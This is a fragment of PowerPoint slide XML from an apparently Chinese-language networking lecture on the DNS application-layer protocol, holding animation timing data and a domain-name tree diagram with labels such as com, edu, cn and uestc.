                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46098"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="62" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="46093"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46093"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46093"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46093"/>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46099"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46099"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46099"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46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bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="46090" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="46091" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="46092" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="46093" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="46094" grpId="0" animBg="1"/>
      <p:bldP spid="46098" grpId="0" animBg="1"/>
      <p:bldP spid="46099" grpId="0" bldLvl="0"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smtClean="0"/>
              <a:t>一种分布式网络目录服务，主要用于域名与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址的相互转换</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>采用了分散和分层的机制来实现域名空间的委派授权以及域名与地址相转换的授权。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142338" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>应用层：域名系统（服务）协议（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）</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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>应用层：域名服务协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Straight Connector 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1619250" y="1844675"/>
            <a:ext cx="1728788" cy="1079500"/>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08" name="Straight Connector 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2663826" y="2239962"/>
            <a:ext cx="1079500" cy="288925"/>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09" name="Straight Connector 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4427538" y="2924175"/>
            <a:ext cx="936625" cy="649288"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="062228"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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10" name="Straight Connector 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3347244" y="1843881"/>
            <a:ext cx="1079500" cy="1081088"/>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11" name="Straight Connector 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3348038" y="1844675"/>
            <a:ext cx="2592387" cy="1079500"/>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12" name="Straight Connector 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3348038" y="1844675"/>
            <a:ext cx="3240087" cy="792163"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="062228"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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13" name="Straight Connector 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3743325" y="2960688"/>
            <a:ext cx="720725" cy="647700"/>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14" name="TextBox 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971550" y="2627313"/>
            <a:ext cx="65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com</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15" name="TextBox 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2411413" y="2627313"/>
            <a:ext cx="590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org</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16" name="TextBox 53"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3694113" y="2636838"/>
            <a:ext cx="446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cn</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17" name="TextBox 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4860925" y="2636838"/>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edu</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18" name="TextBox 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6443663" y="2276475"/>
            <a:ext cx="1795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net/org/uk/…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47119" name="TextBox 64"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3060700" y="3357563"/>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edu</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20" name="Straight Connector 67"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3094831" y="3680619"/>
            <a:ext cx="720725" cy="649288"/>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1" name="Straight Connector 68"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779838" y="3644900"/>
            <a:ext cx="936625" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="062228"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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2" name="TextBox 69"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5364163" y="3284538"/>
            <a:ext cx="1503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com/org/…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47123" name="TextBox 70"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2482850" y="4076700"/>
            <a:ext cx="777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uestc</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24" name="Straight Connector 72"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2195513" y="4365625"/>
            <a:ext cx="936625" cy="790575"/>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5" name="Straight Connector 74"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2735262" y="4760913"/>
            <a:ext cx="790575" cy="0"/>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6" name="Straight Connector 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3132138" y="4365625"/>
            <a:ext cx="935037" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="062228"/>
            </a:solidFill>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7" name="Straight Connector 82"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3132138" y="4365625"/>
            <a:ext cx="1223962" cy="719138"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="062228"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:bevel/>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7128" name="TextBox 85"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403350" y="4868863"/>
            <a:ext cx="717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www</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29" name="TextBox 86"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2482850" y="4868863"/>
            <a:ext cx="593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bbs</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30" name="TextBox 87"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3203575" y="4868863"/>
            <a:ext cx="666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ccse</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31" name="TextBox 88"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4105275" y="4652963"/>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me/ee/…</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47132" name="Oval 89"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1260475" y="4076700"/>
            <a:ext cx="4175125" cy="2376488"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="10D215"/>
            </a:solidFill>
            <a:bevel/>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endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47135" name="Straight Connector 94"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5435600" y="5265738"/>
            <a:ext cx="666750" cy="395287"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent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7136" name="Oval 100"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="1123950"/>
            <a:ext cx="7921625" cy="2305050"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="10D215"/>
            </a:solidFill>
            <a:bevel/>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endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602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7107"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4710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7108"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4710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7110"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="471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111"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4711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7112"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47112"/>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47114"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47114"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47114"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47114"/>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7115"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47115"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47115"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47115"/>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7116"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47116"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47116"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47116"/>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7117"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47117"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47117"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47117"/>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47118"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47118"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47118"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47118"/>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47113"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47113"/>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7109"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47109"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="53" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="54" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47119"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47119"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47119"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
